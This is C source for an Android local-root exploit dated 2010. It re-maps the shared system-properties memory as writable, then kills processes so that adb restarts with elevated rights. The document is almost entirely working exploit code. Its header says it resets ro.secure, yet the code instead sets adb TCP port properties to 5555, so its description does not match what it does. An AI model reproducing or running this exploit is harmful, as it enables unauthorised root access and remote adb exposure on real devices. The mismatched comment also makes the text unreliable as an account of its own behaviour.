/* ro.secure reset exploit for all androids < 2.3. * * Rage Against The Mach

1. /* ro.secure reset exploit for all androids < 2.3.
2. *
3. * Rage Against The Machine: Killing In The Name Of
4. *
5. * (C) 2010 The Android Exploid Crew
6. * This exploit resets ro.secure to 0 even if executed as user.
7. * Then re-connect to the device via "adb -d shell" to get a rootshell.
8. *
9. * Explanation:
10. * The /dev/ashmem protection implementation is buggy. Anyone can
11. * re-map the shared mem (which is owned by init and contains the system
12. * properties) to R/W permissions. Then simply re-set ro.secure to 0
13. * and restart adb which then runs as root rather than shell-user.
14. */
15.  
16. #include <stdio.h>
17. #include <sys/mman.h>
18. #include <sys/types.h>
19. #include <unistd.h>
20. #include <fcntl.h>
21. #include <errno.h>
22. #include <string.h>
23. #include <signal.h>
24. #include <stdlib.h>
25.  
26.  
27. void die(const char *msg)
28. {
29. perror(msg);
30. exit(errno);
31. }
32.  
33. #define PA_SIZE 32768
34. #define PA_INFO_START 1024
35. #define DEFAULTPROP 0x40000000
36. #define PROP_NAME_MAX 32
37. #define PROP_VALUE_MAX 92
38.  
39. struct prop_info {
40. char name[PROP_NAME_MAX];
41. unsigned volatile serial;
42. char value[PROP_VALUE_MAX];
43. };
44.  
45.  
46. struct prop_area {
47. unsigned volatile count;
48. unsigned volatile serial;
49. unsigned magic;
50. unsigned version;
51. unsigned reserved[4];
52. unsigned toc[1];
53. };
54.  
55.  
56. char *find_prop_area()
57. {
58. char buf[256];
59. char *val = NULL;
60.  
61. FILE *f = fopen("/proc/self/maps", "r");
62. if (!f)
63. die("[-] fopen");
64. for (;!feof(f);) {
65. if (!fgets(buf, sizeof(buf), f))
66. break;
67. if (strstr(buf, "system_properties") != NULL) {
68. val = strchr(buf, '-');
69. if (!val)
70. break;
71. *val = 0;
72. val = (char *)strtoul(buf, NULL, 16);
73. break;
74. }
75. }
76. fclose(f);
77. return val;
78. }
79.  
80.  
81. void restart_adb()
82. {
83. kill(-1, 9);
84. }
85.  
86. void create_new_prop(char *name, char *value, struct prop_area *pa, struct prop_info *pi)
87. {
88. int namelen = strlen(name);
89. int valuelen = strlen(value);
90.  
91. pi += pa->count;
92.  
93. memcpy(pi->name, name, namelen + 1);
94. memcpy(pi->value, value, valuelen + 1);
95.  
96. pa->toc[pa->count] = (namelen << 24) | (((unsigned) pi) - ((unsigned) pa));
97. pa->count++;
98. }
99.  
100. int main(int argc, char **argv)
101. {
102. char *prop = NULL;
103. struct prop_info *pi = NULL;
104. struct prop_area *pa = NULL;
105.  
106. char svc = 'n', pst = 'n';
107.  
108.  
109. printf("[*] CVE-2010-743C Android local root exploit (C) 2010 743C\n");
110. printf("[*] The Android Exploid Crew Gentlemens club - dominating robots since 2008.\n\n");
111. printf("[*] Donate to 7-4-3-C@web.de if you like\n\n");
112.  
113. sleep(3);
114.  
115. prop = find_prop_area();
116.  
117. if (!prop)
118. die("[-] Cannot find prop area");
119.  
120. printf("[+] Found prop area @ %p\n", prop);
121. if (mprotect(prop, PA_SIZE, PROT_READ|PROT_WRITE) < 0)
122. die("[-] mprotect");
123.  
124. pi = (struct prop_info *)(prop + PA_INFO_START);
125. pa = (struct prop_area *)prop;
126.  
127. create_new_prop("service.adb.tcp.port", "5555", pa, pi);
128. create_new_prop("persist.adb.tcp.port", "5555", pa, pi);
129. printf("created properties\n");
130. printf("count: %d\n", pa->count);
131.  
132. while (pa->count--) {
133. //printf("[*] %s: %s\n", pi->name, pi->value);
134.  
135. if (strcmp(pi->name, "service.adb.tcp.port") == 0) {
136. strcpy(pi->value, "5555");
137. printf("[+] service.adb.tcp.port\n");
138. //break;
139. svc = 'y';
140. }
141. if (strcmp(pi->name, "persist.adb.tcp.port") == 0) {
142. strcpy(pi->value, "5555");
143. printf("[+] persist.adb.tcp.port\n");
144. pst = 'y';
145. }
146.  
147. if(pst == 'y' && svc == 'y')
148. break;
149. ++pi;
150. }
151.  
152. printf("[*] Restarting adb. Please reconnect for rootshell (adb kill-server; adb -d shell).\n");
153. fflush(stdout); sleep(2);
154. restart_adb();
155. return 0;
156. }